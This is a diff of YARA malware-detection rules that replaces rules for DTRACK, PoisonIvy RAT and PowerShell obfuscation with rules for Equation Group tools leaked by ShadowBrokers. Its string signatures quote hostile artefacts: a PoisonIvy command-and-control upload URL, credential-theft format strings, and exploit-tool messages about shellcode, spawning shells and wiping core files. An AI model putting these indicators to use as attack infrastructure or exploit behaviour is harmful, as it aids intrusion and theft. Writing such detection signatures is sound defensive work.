 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 10000KB and all of them )
+		( uint16( 0 ) == 0x457f and filesize < 80KB and all of them )
 }
-rule SIGNATURE_BASE_APT_MAL_DTRACK_Oct19_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_DUL : FILE
 {
 	meta:
-		description = "Detects DTRACK malware"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file DUL"
 		author = "Florian Roth (Nextron Systems)"
-		id = "802135bd-234d-574d-b111-fcc9eaa000f8"
-		date = "2019-10-28"
+		id = "6dd90b30-30cb-531c-b8e2-fc208b21e8e6"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/a_tweeter_user/status/1188811977851887616?s=21"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dtrack.yar#L2-L44"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L539-L553"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b99bc8ec4df7185da306365dc2a24a0849ff0d5d92269daaa1efbb20f5e5bf83"
+		logic_hash = "55df9a844352babf0c30075139e2a62cbf9db898280546d27b172e4d611ce1c0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c5c1ca4382f397481174914b1931e851a9c61f029e6b3eb8a65c9e92ddf7aa4c"
-		hash2 = "a0664ac662802905329ec6ab3b3ae843f191e6555b707f305f8f5a0599ca3f68"
-		hash3 = "93a01fbbdd63943c151679d037d32b1d82a55d66c6cb93c40ff63f2b770e5ca9"
-		hash4 = "3cc9d9a12f3b884582e5c4daf7d83c4a510172a836de90b87439388e3cde3682"
-		hash5 = "bfb39f486372a509f307cde3361795a2f9f759cbeb4cac07562dcbaebc070364"
-		hash6 = "58fef66f346fe3ed320e22640ab997055e54c8704fc272392d71e367e2d1c2bb"
-		hash7 = "9d9571b93218f9a635cfeb67b3b31e211be062fd0593c0756eb06a1f58e187fd"
+		hash1 = "24d1d50960d4ebf348b48b4db4a15e50f328ab2c0e24db805b106d527fc5fe8e"
 
 	strings:
-		$xc1 = { 25 73 2A 2E 2A 00 00 00 5C 00 00 00 25 73 7E 00
-               5C 00 00 00 77 62 00 00 64 61 74 00 64 6B 77 65
-               72 6F 33 38 6F 65 72 41 5E 74 40 23 00 00 00 00
-               63 3A 5C 00 25 73 5C 25 63 2E 74 6D 70 }
-		$sx1 = "%02d.%02d.%04d - %02d:%02d:%02d:%03d : " fullword ascii
-		$sx2 = "%s\\%c.tmp" fullword ascii
-		$sx3 = "dkwero38oerA" fullword ascii
-		$sx4 = "awz2qr21yfbj" fullword ascii
-		$s1 = "Execute_%s.log" ascii
-		$s2 = "%s\\%s\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" fullword ascii
-		$s3 = "CCS_Mozilla/5.0" fullword ascii
-		$s4 = "\\C$\\Windows\\Temp\\MpLogs\\" ascii
-		$s5 = "127.0.0.1 >NUL & echo EEEE > \"%s\"" fullword ascii
-		$s6 = "[+] DownloadCommand" fullword ascii
-		$s7 = "DC-Error: Too long cmd length" fullword ascii
-		$s8 = "%s\\~%d.tmp" fullword ascii
-		$s9 = "%02X:%02X:%02X:%02X:%02X:%02X" ascii fullword
-		$op1 = { 0f b6 8d a3 fc ff ff 85 c9 74 09 8b 55 f4 83 c2 }
-		$op2 = { 6a 00 8d 85 28 fc ff ff 50 6a 04 8d 4d f8 51 8b }
-		$op3 = { 8b 85 c8 fd ff ff 03 85 a4 fc ff ff 89 85 b4 fc }
+		$x1 = "?Usage: %s <shellcode> <output_file>" fullword ascii
+		$x2 = "Here is the decoder+(encoded-decoder)+payload" fullword ascii
 
 	condition:
-		$xc1 or 2 of ( $sx* ) or 4 of them or ( uint16( 0 ) == 0x5a4d and filesize <= 3000KB and 2 of them )
+		( uint16( 0 ) == 0x457f and filesize < 80KB and 1 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Poisonivy_Sample_APT : FILE
+rule SIGNATURE_BASE_Equationgroup_Slugger2 : FILE
 {
 	meta:
-		description = "Detects a PoisonIvy APT malware group"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file slugger2"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8d3b8222-8949-57dc-99b7-092189416efd"
-		date = "2015-06-03"
+		id = "3787a39e-0123-5b46-90c9-6b772b1fd96c"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poisonivy.yar#L2-L21"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L555-L574"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b874b76ff7b281c8baa80e4a71fc9be514093c70"
-		logic_hash = "938df757d1f5ee1028d61dbc2ab76a33c788a44f87cb0d84626420e20bfb5fa4"
-		score = 70
+		logic_hash = "3c736fdfa96d5e99bc4d093c03a81b8a4f58501ec8c03a2891f9f694d88b5284"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a6a9ab66d73e4b443a80a69ef55a64da7f0af08dfaa7e17eb19c327301a70bdf"
 
 	strings:
-		$s0 = "pidll.dll" fullword ascii
-		$s1 = "sens32.dll" fullword wide
-		$s3 = "FileDescription" fullword wide
-		$s4 = "OriginalFilename" fullword wide
-		$s5 = "ZwSetInformationProcess" fullword ascii
-		$s9 = "Microsoft Media Device Service Provider" fullword wide
+		$x1 = "usage: %s hostip port cmd [printer_name]" fullword ascii
+		$x2 = "command must be less than 61 chars" fullword ascii
+		$s1 = "__rw_read_waiting" ascii
+		$s2 = "completed.1" fullword ascii
+		$s3 = "__mutexkind" ascii
+		$s4 = "__rw_pshared" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 47KB and all of them
+		( uint16( 0 ) == 0x457f and filesize < 50KB and ( 4 of them and 1 of ( $x* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Poisonivy_Sample_APT_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Ebbisland : FILE
 {
 	meta:
-		description = "Detects a PoisonIvy Malware"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file ebbisland"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4d64ccd2-add8-5749-8178-f2c5336e1495"
-		date = "2015-06-03"
+		id = "d30b9f26-c2c5-5ecb-9f63-e96017788e40"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poisonivy.yar#L24-L58"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L576-L594"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "333f956bf3d5fc9b32183e8939d135bc0fcc5770"
-		logic_hash = "58d62278d776c9f7c3ae0815aa4b248f85c5fc648405b8d1ba2b8eb2847e1e88"
-		score = 70
-		quality = 83
+		logic_hash = "1f4b5054d4239e23146f0764ffe9037b658ecdb9a5f479956c5c45abc1012a17"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "eba07c98c7e960bb6c71dafde85f5da9f74fd61bc87793c87e04b1ae2d77e977"
 
 	strings:
-		$s0 = "pidll.dll" fullword ascii
-		$s1 = "sens32.dll" fullword wide
-		$s2 = "9.0.1.56" fullword wide
-		$s3 = "FileDescription" fullword wide
-		$s4 = "OriginalFilename" fullword wide
-		$s5 = "ZwSetInformationProcess" fullword ascii
-		$s6 = "\"%=%14=" fullword ascii
-		$s7 = "091A1G1R1_1g1u1z1" fullword ascii
-		$s8 = "gHsMZz" fullword ascii
-		$s9 = "Microsoft Media Device Service Provider" fullword wide
-		$s10 = "Copyright (C) Microsoft Corp." fullword wide
-		$s11 = "MFC42.DLL" fullword ascii
-		$s12 = "MSVCRT.dll" fullword ascii
-		$s13 = "SpecialBuild" fullword wide
-		$s14 = "PrivateBuild" fullword wide
-		$s15 = "Comments" fullword wide
-		$s16 = "040904b0" fullword wide
-		$s17 = "LegalTrademarks" fullword wide
-		$s18 = "CreateThread" fullword ascii
-		$s19 = "ntdll.dll" fullword ascii
-		$s20 = "_adjust_fdiv" ascii
+		$x1 = "Usage: %s [-V] -t <target_ip> -p port" fullword ascii
+		$x2 = "error - shellcode not as expected - unable to fix up" fullword ascii
+		$x3 = "WARNING - core wipe mode - this will leave a core file on target" fullword ascii
+		$x4 = "[-C] wipe target core file (leaves less incriminating core on failed target)" fullword ascii
+		$x5 = "-A <jumpAddr> (shellcode address)" fullword ascii
+		$x6 = "*** Insane undocumented incremental port mode!!! ***" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 47KB and all of them
+		filesize < 250KB and 1 of them
 }
-rule SIGNATURE_BASE_Poisonivy_Sample_APT_3 : FILE
+rule SIGNATURE_BASE_Equationgroup_Jackpop : FILE
 {
 	meta:
-		description = "Detects a PoisonIvy Malware"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file jackpop"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e2e0bf75-7704-585f-b2b3-727d14946c76"
-		date = "2015-06-03"
+		id = "7c650752-200b-51e7-95c2-4d385bfd5844"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poisonivy.yar#L60-L76"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L596-L614"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "df3e1668ac20edecc12f2c1a873667ea1a6c3d6a"
-		logic_hash = "96f8324dcf85f5baa64178774abf17516a9e023dd6fa38e2bce0fe5159a4f704"
-		score = 70
+		logic_hash = "6efc4ccd2727f93713ad35dc1f054fa25e976e8c3d95f00226fbd56d7f1ce30b"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0b208af860bb2c7ef6b1ae1fcef604c2c3d15fc558ad8ea241160bf4cbac1519"
 
 	strings:
-		$s0 = "\\notepad.exe" ascii
-		$s1 = "\\RasAuto.dll" ascii
-		$s3 = "winlogon.exe" fullword ascii
+		$x1 = "%x:%d  --> %x:%d %d bytes" fullword ascii
+		$s1 = "client: can't bind to local address, are you root?" fullword ascii
+		$s2 = "Unable to register port" fullword ascii
+		$s3 = "Could not resolve destination" fullword ascii
+		$s4 = "raw troubles" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		( uint16( 0 ) == 0x457f and filesize < 30KB and 3 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Poisonivy_Sample_APT_4 : FILE
+rule SIGNATURE_BASE_Equationgroup_Parsescan : FILE
 {
 	meta:
-		description = "Detects a PoisonIvy Sample APT"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file parsescan"
 		author = "Florian Roth (Nextron Systems)"
-		id = "02bf546b-99a2-5ffb-8ee7-7bb005ef953b"
-		date = "2015-06-03"
+		id = "bbe8b518-2bf0-5de4-8fb8-9b8609d393dc"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poisonivy.yar#L79-L101"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L616-L630"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "558f0f0b728b6da537e2666fbf32f3c9c7bd4c0c"
-		logic_hash = "7ba10269d31e985dff582ae4103ef1179172ae475e078161864f185380bb5035"
-		score = 70
+		logic_hash = "25e0bc21f93cd72814cd6114883ed903af84a62dced126201b6037a476dbd2cd"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef"
 
 	strings:
-		$s0 = "Microsoft Software installation Service" fullword wide
-		$s1 = "idll.dll" fullword ascii
-		$s2 = "mgmts.dll" fullword wide
-		$s3 = "Microsoft(R) Windows(R)" fullword wide
-		$s4 = "ServiceMain" fullword ascii
-		$s5 = "Software installation Service" fullword wide
-		$s6 = "SetServiceStatus" fullword ascii
-		$s7 = "OriginalFilename" fullword wide
-		$s8 = "ZwSetInformationProcess" fullword ascii
+		$s1 = "$gotgs=1 if (($line =~ /Scan for (Sol|SNMP)\\s+version/) or" fullword ascii
+		$s2 = "Usage:  $prog [-f file] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 7 of them
+		filesize < 250KB and 1 of them
 }
-rule SIGNATURE_BASE_Poisonivy_Sample_5 : FILE
+rule SIGNATURE_BASE_Equationgroup_Jscan : FILE
 {
 	meta:
-		description = "Detects PoisonIvy RAT sample set"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file jscan"
 		author = "Florian Roth (Nextron Systems)"
-		id = "61f7efd4-745a-5f06-a66d-b4b2a2ecc614"
-		date = "2015-06-03"
+		id = "c4cebc69-8ec8-5ad7-bd93-55565b3eb92b"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poisonivy.yar#L103-L123"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L632-L646"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "545e261b3b00d116a1d69201ece8ca78d9704eb2"
-		logic_hash = "3f88b673b80b67a110915285a87ead265ad0176ea414426ba55e780e3aa396fe"
-		score = 70
+		logic_hash = "d3bbdb90da9fa5b8b41a8b5d35a9b42e4fa15f291146575b0ef22e81441dcbde"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8075f56e44185e1be26b631a2bad89c5e4190c2bfc9fa56921ea3bbc51695dbe"
 
 	strings:
-		$s0 = "Microsoft Software installation Service" fullword wide
-		$s2 = "pidll.dll" fullword ascii
-		$s3 = "\\mspmsnsv.dll" ascii
-		$s4 = "\\sfc.exe" ascii
-		$s13 = "ServiceMain" fullword ascii
-		$s15 = "ZwSetInformationProcess" fullword ascii
-		$s17 = "LookupPrivilegeValueA" fullword ascii
+		$s1 = "$scanth = $scanth . \" -s \" . $scanthreads;" fullword ascii
+		$s2 = "print \"java -jar jscanner.jar$scanth$list\\n\";" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		filesize < 250KB and 1 of them
 }
-rule SIGNATURE_BASE_Poisonivy_Sample_6 : FILE
+rule SIGNATURE_BASE_Equationgroup_Promptkill : FILE
 {
 	meta:
-		description = "Detects PoisonIvy RAT sample set"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file promptkill"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f364fad0-3684-5500-b21b-396f1e259217"
-		date = "2015-06-03"
+		id = "e0749b10-fa5a-5d73-86e1-e2008e121674"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poisonivy.yar#L126-L164"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L648-L662"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0d77fd224b8d2dfd506faf0d3e359bf04172cc2854dc737e05c4bf99d0e1f3f7"
-		score = 70
+		logic_hash = "7b46161b8cbb9a539171349b3e2a58f8e5a48c344b6d99020b3e96da9c878771"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8c2630ab9b56c00fd748a631098fa4339f46d42b"
-		hash2 = "36b4cbc834b2f93a8856ff0e03b7a6897fb59bd3"
+		hash1 = "b448204503849926be249a9bafbfc1e36ef16421c5d3cfac5dac91f35eeaa52d"
 
 	strings:
-		$x1 = "124.133.252.150" fullword ascii
-		$x3 = "http://124.133.254.171/up/up.asp?id=%08x&pcname=%s" fullword ascii
-		$z1 = "\\temp\\si.txt" ascii
-		$z2 = "Daemon Dynamic Link Library" fullword wide
-		$z3 = "Microsoft Windows CTF Loader" fullword wide
-		$z4 = "\\tappmgmts.dll" ascii
-		$z5 = "\\appmgmts.dll" ascii
-		$s0 = "%USERPROFILE%\\AppData\\Local\\Temp\\Low\\ctfmon.log" fullword ascii
-		$s1 = "%USERPROFILE%\\AppData\\Local\\Temp\\ctfmon.tmp" fullword ascii
-		$s2 = "\\temp\\ctfmon.tmp" ascii
-		$s3 = "SOFTWARE\\Classes\\http\\shell\\open\\commandV" fullword ascii
-		$s4 = "CONNECT %s:%i HTTP/1.0" fullword ascii
-		$s5 = "start read histry key" fullword ascii
-		$s6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" fullword ascii
-		$s7 = "[password]%s" fullword ascii
-		$s8 = "Daemon.dll" fullword ascii
-		$s9 = "[username]%s" fullword ascii
-		$s10 = "advpack" fullword ascii
-		$s11 = "%s%2.2X" fullword ascii
-		$s12 = "advAPI32" fullword ascii
+		$x1 = "exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");" fullword ascii
+		$x2 = "$xargs=\"-title \\\"Kill process $pid?\\\" -name \\\"Kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) ) or ( 8 of ( $s* ) ) or ( 1 of ( $z* ) and 3 of ( $s* ) )
+		filesize < 250KB and 1 of them
 }
-rule SIGNATURE_BASE_Poisonivy_Sample_7 : FILE
+rule SIGNATURE_BASE_Equationgroup_Epoxyresin_V1_0_0 : FILE
 {
 	meta:
-		description = "Detects PoisonIvy RAT sample set"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "01224053-d95e-5144-981b-76cd7e57e1c3"
-		date = "2015-06-03"
+		id = "390a13b0-3246-5bf7-8841-775a43045172"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poisonivy.yar#L166-L185"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L664-L681"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9480cf544beeeb63ffd07442233eb5c5f0cf03b3"
-		logic_hash = "28db3fb7fa5b5e60ad1d1cc2b6d3d9d30a1948491105439201574ca354eb8bd1"
-		score = 70
-		quality = 85
+		logic_hash = "c1cbc18f05b299837463aa27a9c47ea0355ca5974b2c6ab1e0a18cc9ad1b26a1"
+		score = 75
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "eea8a6a674d5063d7d6fc9fe07060f35b16172de6d273748d70576b01bf01c73"
 
 	strings:
-		$s0 = "Microsoft Software installation Service" fullword wide
-		$s2 = "pidll.dll" fullword ascii
-		$s10 = "ServiceMain" fullword ascii
-		$s11 = "ZwSetInformationProcess" fullword ascii
-		$s12 = "Software installation Service" fullword wide
-		$s13 = "Microsoft(R) Windows(R) Operating System" fullword wide
+		$x1 = "[-] kernel not vulnerable" fullword ascii
+		$s1 = ".tmp.%d.XXXXXX" fullword ascii
+		$s2 = "[-] couldn't create temp file" fullword ascii
+		$s3 = "/boot/System.map-%s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		( uint16( 0 ) == 0x457f and filesize < 30KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_Poisonivy_RAT_Ssmuidll : FILE
+rule SIGNATURE_BASE_Equationgroup_Estopmoonlit : FILE
 {
 	meta:
-		description = "Detects PoisonIvy RAT DLL mentioned in Palo Alto Blog in April 2016"
-		author = "Florian Roth (Nextron Systems) (with the help of yarGen and Binarly)"
-		id = "f2535b70-cf17-5435-9fc8-2dfdf70d95ac"
-		date = "2016-04-22"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file estopmoonlit"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7ae7a8b7-5e27-5604-8c57-6d60ffa0fb72"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/WiwtYT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poisonivy.yar#L196-L230"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L683-L699"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d048d88cac40f4fe3affee8d9dad35a7347a5459fbdd56b08a77ece4f6c2ac08"
+		logic_hash = "06293b6f48d2595f3426088cddc4b0c4d1ebc1de90fa640d5b5e806a45a2b6bd"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "7a424ad3f3106b87e8e82c7125834d7d8af8730a2a97485a639928f66d5f6bf4"
-		hash2 = "6eb7657603edb2b75ed01c004d88087abe24df9527b272605b8517a423557fe6"
-		hash3 = "2a6ef9dde178c4afe32fe676ff864162f104d85fac2439986de32366625dc083"
-		hash4 = "8b805f508879ecdc9bba711cfbdd570740c4825b969c1b4db980c134ac8fef1c"
-		hash5 = "ac99d4197e41802ff9f8852577955950332947534d8e2a0e3b6c1dd1715490d4"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "707ecc234ed07c16119644742ebf563b319b515bf57fd43b669d3791a1c5e220"
 
 	strings:
-		$s1 = "ssMUIDLL.dll" fullword ascii
-		$op1 = { 6a 00 c6 07 e9 ff d6 }
-		$op2 = { 02 cb 6a 00 88 0f ff d6 47 ff 4d fc 75 }
-		$op3 = { 6a 00 88 7f 02 ff d6 }
+		$x1 = "[+] shellcode prepared, re-executing" fullword ascii
+		$x2 = "[-] kernel not vulnerable: prctl" fullword ascii
+		$x3 = "[-] shell failed" fullword ascii
+		$x4 = "[!] selinux apparently enforcing.  Continue [y|n]? " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20KB and ( all of ( $op* ) ) ) or ( all of them )
+		filesize < 250KB and 1 of them
 }
-rule SIGNATURE_BASE_Powershell_Isesteroids_Obfuscation
+rule SIGNATURE_BASE_Equationgroup_Envoytomato : FILE
 {
 	meta:
-		description = "Detects PowerShell ISESteroids obfuscation"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file envoytomato"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d686c4de-28fd-5d77-91d4-dde5661b75cd"
-		date = "2017-06-23"
-		modified = "2025-02-12"
-		reference = "https://twitter.com/danielhbohannon/status/877953970437844993"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_obfuscation.yar#L11-L26"
+		id = "d1a43c98-9448-5a03-824d-5cd8e959fbf5"
+		date = "2017-04-08"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L701-L715"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6d9476f679614e34a0d13664baffd15b0bdb896f7eeca2c9de66bdc0d65a2eec"
+		logic_hash = "f15b3b4281ec45a7a71c9bf8b88c60befec665f78b76a615c5912a6b7f94235b"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9bd001057cc97b81fdf2450be7bf3b34f1941379e588a7173ab7fffca41d4ad5"
 
 	strings:
-		$x1 = "/\\/===\\__" ascii
-		$x2 = "${__/\\/==" ascii
-		$x3 = "Catch { }" fullword ascii
-		$x4 = "\\_/=} ${_" ascii
+		$s1 = "[-] kernel not vulnerable" fullword ascii
+		$s2 = "[-] failed to spawn shell" fullword ascii
 
 	condition:
-		2 of them
+		filesize < 250KB and 1 of them
 }
-rule SIGNATURE_BASE_SUSP_Obfuscted_Powershell_Code
+rule SIGNATURE_BASE_Equationgroup_Smash : FILE
 {
 	meta:
-		description = "Detects obfuscated PowerShell Code"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file smash"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e2d8fc9e-ce2b-5118-8305-0d5839561d4f"
-		date = "2018-12-13"
-		modified = "2025-02-12"
-		reference = "https://twitter.com/silv0123/status/1073072691584880640"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_obfuscation.yar#L28-L41"
+		id = "9a8cb090-4f47-5674-accb-f233dbb19b71"
+		date = "2017-04-08"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L717-L732"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "afd7e4b88c812b23441549565a18fde18c24fe91ec467455002ef338e092ebf9"
-		score = 65
+		logic_hash = "073496e34dded05be40ee851442f9c0ec998f35e02a5d4221677a195b792f786"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1dc94b46aaff06d65a3bf724c8701e5f095c1c9c131b65b2f667e11b1f0129a6"
 
 	strings:
-		$s1 = "').Invoke(" ascii
-		$s2 = "(\"{1}{0}\"" ascii
-		$s3 = "{0}\" -f" ascii
+		$x1 = "T=<target IP> [O=<port>] Y=<target type>" fullword ascii
+		$x2 = "no command given!! bailing..." fullword ascii
+		$x3 = "no port. assuming 22..." fullword ascii
 
 	condition:
-		#s1> 11 and #s2 > 10 and #s3 > 10
+		filesize < 250KB and 1 of them
 }
-rule SIGNATURE_BASE_SUSP_OBFUSC_Powershell_True_Jun20_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Ratload : FILE
 {
 	meta:
-		description = "Detects indicators often found in obfuscated PowerShell scripts. Note: This detection is based on common characteristics typically associated with the mentioned threats, must be considered a clue and does not conclusively prove maliciousness."
+		description = "Equation Group hack tool leaked by ShadowBrokers- file ratload"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e9bb870b-ad72-57d3-beff-2f84a81490eb"
-		date = "2020-06-27"
-		modified = "2025-02-12"
-		reference = "https://github.com/corneacristian/mimikatz-bypass/"
